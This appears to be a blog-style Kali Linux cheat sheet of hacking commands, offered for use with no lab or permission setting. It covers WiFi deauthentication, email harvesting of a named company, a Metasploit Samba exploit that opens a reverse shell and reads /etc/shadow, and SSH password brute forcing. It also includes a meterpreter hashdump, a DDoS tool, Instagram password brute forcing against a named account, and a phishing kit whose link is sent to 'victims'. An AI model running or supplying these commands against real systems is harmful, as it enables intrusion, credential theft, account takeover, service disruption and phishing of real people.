Kali Linux – Hacking methods Full

How to login as root user

# sudo su

How to change wifi to monitor mode – wlan0mon

root# ifconfig wlan0 down

root# iwconfig wlan0 mode monitor

root# ifconfig wlan0 up

root# airmon-ng check kill

root# airmon-ng start wlan0

root# ifconfig wlan0mon up

How to disable monitor mode to managed mode

root# ifconfig wlan0mon down

root# iwconfig wlan0mon mode managed

root# ifconfig wlan0mon up

root# sudo airmon-ng stop wlan0mon

root# service network-manager start

Reboot the kali linux system

How to change MAC Address on Linux Machine

root# ifconfig

root# ifconfig wlan0 down

root# ifconfig wlan0 hw ether 00:11:22:33:44:55

root# ifconfig wlan0 up

How to disconnect or Deauthenticating device from wifi network using linux command

root# airodump-ng –band a wlan0mon (finding target wifi network MAC Address and channel note it)

root# airodump-ng mon0 (finding target wifi network MAC Address and channel)

root# airodump-ng – -channel 11 – -bssid 64:7C:34:A4:BB:B2 mon0 (finding list target machine mac address on this list)

For example wifi MAC address: 64:7C:34:A4:BB:B2 and Targe pc MAC address: 00:11:22:33:44:55

root# aireplay-ng –deauth 10000 -a 64:7C:34:A4:BB:B2 -c 00:11:22:33:44:55 mon0

How to stop Aireplay-ng running process command

root# killall aireplay-ng

root# jobs (finding list of running jobs and note on id number)

root# kill %1

How to disconnect all device from Wifi Network using linux command Aireplay-ng

root# airodump-ng wlan0mon (finding target wifi network MAC Address and channel)

for example Target access point MAC address:64:7C:34:A4:BB:B2

root# aireplay-ng – -deauth 1000000 -a 64:7C:34:A4:BB:B2 wlan0mon

If error come from different channel then do airodump-ng find correct channel to fix this error

root# airodump-ng – -bssid 64:7C:34:A4:BB:B2 – -channel 11 wlan0mon

root# aireplay-ng – -deauth 1000000 -a 64:7C:34:A4:BB:B2 wlan0mon

How to find hidden network SSID name

using airodump-ng will find list of network. After that deauthentication method to disconnect one of client machine. Then client machine will sent hidden network information to air. Using airodump-ng will capture that hidden network name.

Finding list of network using airdoump-ng

root# airodump-ng wlan0mon

list will find hidden network without ESSID name, take note it on mac address and Channel.

for example hidden network mac address:11:22:33:44:55:66 and channel 6

root# airodump-ng –bssid 11:22:33:44:55:66 –channel 6 wlan0mon

above code will display list client connected on hidden nework. keep run above session ,Don’t disconnect this process meanwhile separate window open and run deauthentication method remove client connected on hidden network.

For example client mac address: 55:44:33:22:11

root# aireplay-ng –deauth 4 -a 11:22:33:44:55:66 -c 55:44:33:22:11 wlan0mon

now will disconnect client from hidden network and SSID name show to airodump-ng screen.

How to check wifi wlan0 on monitor mode or managed mode

root# iwconfig

Find company and employee email address

root@kali:~# theHarvester -d geminigroup.co -l 500 -b google

Find sub domain on any website user Sublist3r

Download from : git clone https://github.com/aboul3la/Sublist3r.git

Sublist3r# python3 sublist3r.py -b -d testwebsite.com

root# sublist3r -d sukheshcstest.com

website for finding subdomain : https://crt.sh/

Finding website back-end technology details

root# whatweb sukheshcs.com

Use firefox extension: wappalyzer

Using Burp Suite software: Set manual network proxy on firefox : port 8080 – use this proxy server for all protocols

open firefox go to webiste and download CA certificate: https://burp/

Import CA certificate on firefox – privacy&security – view certificate -Autorities session- import certificate

Burpsuite proxy tab – start intercept

Finding IP Address and mac address on local area network

root# netdiscover -r

Scan vulnerability on webpage

root# nikto -h http://google.com

Samba server SMB login on Kali

root# smbclient -L \\\\\

Port scan method

root# masscan -pl-65535 –rate

root# nmap -T4 -p-

root# nmap -T4 -p 22,80,110,139,443,32768 -A

Port scan with Metasploit

root# msfconsole

root# search portscan

msf5 > search portscan

# Name Disclosure Date Rank Check Description

0 auxiliary/scanner/http/wordpress_pingback_access normal No WordPress Pingback Locator
1 auxiliary/scanner/natpmp/natpmp_portscan normal No NAT-PMP External Port Scanner
2 auxiliary/scanner/portscan/ack normal No TCP ACK Firewall Scanner
3 auxiliary/scanner/portscan/ftpbounce normal No FTP Bounce Port Scanner
4 auxiliary/scanner/portscan/syn normal No TCP SYN Port Scanner
5 auxiliary/scanner/portscan/tcp normal No TCP Port Scanner
6 auxiliary/scanner/portscan/xmas normal No TCP “XMas” Port Scanner
7 auxiliary/scanner/sap/sap_router_portscanner normal No SAPRouter Port Scanner

Interact with a module by name or index, for example use 7 or use auxiliary/scanner/sap/sap_router_portscanner

msf5 > use 4
msf5 auxiliary(scanner/portscan/syn) > set rhosts
rhosts =>
msf5 auxiliary(scanner/portscan/syn) > set ports 1-65535
ports => 1-65535
msf5 auxiliary(scanner/portscan/syn) > run

Port scan with Nessus

Download nessus from : https://www.tenable.com/downloads/nessus?loginAttempted=true

root# dpkg -i Nessus-8.12.0-ubuntu910_amd64.deb

You can start Nessus Scanner by typing /bin/systemctl start nessusd.service

Then go to https://kali:8834/ to configure your scanner

root# /bin/systemctl start nessusd.service

start scan port on web based nessess tool

Search samba Exploit on Kali- trans2open

Target pc ip address:

root@kali:~# searchsploit samba 2.2

Exploit Title | Path

Samba 2.0.x/2.2 – Arbitrary File Creatio | unix/remote/20968.txt
Samba 2.2.0 < 2.2.8 (OSX) – trans2open O | osx/remote/9924.rb
Samba 2.2.2 < 2.2.6 – ‘nttrans’ Remote B | linux/remote/16321.rb
Samba 2.2.8 (BSD x86) – ‘trans2open’ Rem | bsd_x86/remote/16880.rb
Samba 2.2.8 (Linux Kernel 2.6 / Debian / | linux/local/23674.txt
Samba 2.2.8 (Linux x86) – ‘trans2open’ R | linux_x86/remote/16861.rb
Samba 2.2.8 (OSX/PPC) – ‘trans2open’ Rem | osx_ppc/remote/16876.rb
Samba 2.2.8 (Solaris SPARC) – ‘trans2ope | solaris_sparc/remote/16330.rb
Samba 2.2.8 – Brute Force Method Remote | linux/remote/55.c
Samba 2.2.x – ‘call_trans2open’ Remote B | unix/remote/22468.c
Samba 2.2.x – ‘call_trans2open’ Remote B | unix/remote/22469.c
Samba 2.2.x – ‘call_trans2open’ Remote B | unix/remote/22470.c
Samba 2.2.x – ‘call_trans2open’ Remote B | unix/remote/22471.txt
Samba 2.2.x – ‘nttrans’ Remote Overflow | linux/remote/9936.rb
Samba 2.2.x – CIFS/9000 Server A.01.x Pa | unix/remote/22356.c
Samba 2.2.x – Remote Buffer Overflow | linux/remote/7.pl
Samba < 2.2.8 (Linux/BSD) – Remote Code | multiple/remote/10.c
Samba < 2.2.8 (Linux/BSD) – Remote Code | multiple/remote/10.c
Samba < 3.0.20 – Remote Heap Overflow | linux/remote/7701.txt
Samba < 3.6.2 (x86) – Denial of Service | linux_x86/dos/36741.py

root@kali:~# msfconsole

msf5 > search trans2open

# Name Disclosure Date Rank Check Description

0 exploit/freebsd/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (*BSD x86)
1 exploit/linux/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Linux x86)
2 exploit/osx/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Mac OS X PPC)
3 exploit/solaris/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Solaris SPARC)

Interact with a module by name or index, for example use 3 or use exploit/solaris/samba/trans2open

msf5 > use 1

msf5 exploit(linux/samba/trans2open) > options

Module options (exploit/linux/samba/trans2open):

Name Current Setting Required Description
—- ————— ——– ———–
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax ‘file:’
RPORT 139 yes The target port (TCP)

Payload options (linux/x86/meterpreter/reverse_tcp):

Name Current Setting Required Description
—- ————— ——– ———–
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port

Exploit target:

Id Name
— —-
0 Samba 2.2.x – Bruteforce

msf5 exploit(linux/samba/trans2open) > set rhosts
rhosts =>

msf5 exploit(linux/samba/trans2open) > set payload linux/x86/ ( double Tab button press to show all options)
set payload linux/x86/adduser set payload linux/x86/shell/bind_ipv6_tcp
set payload linux/x86/chmod set payload linux/x86/shell/bind_ipv6_tcp_uuid
set payload linux/x86/exec set payload linux/x86/shell/bind_nonx_tcp
set payload linux/x86/meterpreter/bind_ipv6_tcp set payload linux/x86/shell/bind_tcp
set payload linux/x86/meterpreter/bind_ipv6_tcp_uuid set payload linux/x86/shell/bind_tcp_uuid
set payload linux/x86/meterpreter/bind_nonx_tcp set payload linux/x86/shell/reverse_ipv6_tcp
set payload linux/x86/meterpreter/bind_tcp set payload linux/x86/shell/reverse_nonx_tcp
set payload linux/x86/meterpreter/bind_tcp_uuid set payload linux/x86/shell/reverse_tcp
set payload linux/x86/meterpreter/reverse_ipv6_tcp set payload linux/x86/shell/reverse_tcp_uuid
set payload linux/x86/meterpreter/reverse_nonx_tcp set payload linux/x86/shell_bind_ipv6_tcp
set payload linux/x86/meterpreter/reverse_tcp set payload linux/x86/shell_bind_tcp
set payload linux/x86/meterpreter/reverse_tcp_uuid set payload linux/x86/shell_bind_tcp_random_port
set payload linux/x86/metsvc_bind_tcp set payload linux/x86/shell_reverse_tcp
set payload linux/x86/metsvc_reverse_tcp set payload linux/x86/shell_reverse_tcp_ipv6
set payload linux/x86/read_file

msf5 exploit(linux/samba/trans2open) > set payload linux/x86/shell_reverse_tcp

payload => linux/x86/shell_reverse_tcp
msf5 exploit(linux/samba/trans2open) > run

cat /etc/passwd

cat /etc/shadow

Finding wordlist location on Kali linux

root# .. /usr/share/wordlists/metasploit/ (double tab press)

root@kali:~# hydra -l root -P /usr/share/wordlists/metasploit/unix_passwords.txt ssh:// -t 4 -V

root# msfconsole
msf5> search ssh
msf5> use auxiliary/scanner/ssh/ssh_login
msf5> options
msf5> set username root
msf5> set pass_file /usr/share/wordlists/metasploit/unix_passwords.tx
msf5> set rhosts
msf5> set threads 10
msf5> set verbose true
msf5> run

nmap -A -T4 -p-

nmap -sC -sV -p$ports
ports=$(nmap -p- –min-rate=1000 -T4 | grep ^[0-9] | cut -d ‘/’ -f 1 | tr ‘\n’ ‘,’ | sed s/,$//)

meterpreter> getuid
meterpreter> sysinfor
metepreter> hashdump
metepreter > shell

> smbclient -N -L \\\\\\backup$
> dir
> get filename

root# dirbuster

open OWASP Dirbuster

target url:

select file list: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt


DDOS attack – Hammer tool

root#git clone https://github.com/cyweb/hammer.git

cd hammer

python3 hammer.py -s -p 80 -t 135

Instagram Bootforce with password list-

root#git clone https://github.com/Bitwise-01/Instagram-.git

root# cd Instagram-/

root# python3 instagram.py lockdownscs /root/Desktop/wordlist.txt -m 0

Phishing attack with kali linux

root# git clone https://github.com/htr-tech/zphisher.git

cd zphisher

root# ./zphisher.sh

List of method shows and share url to the vitms.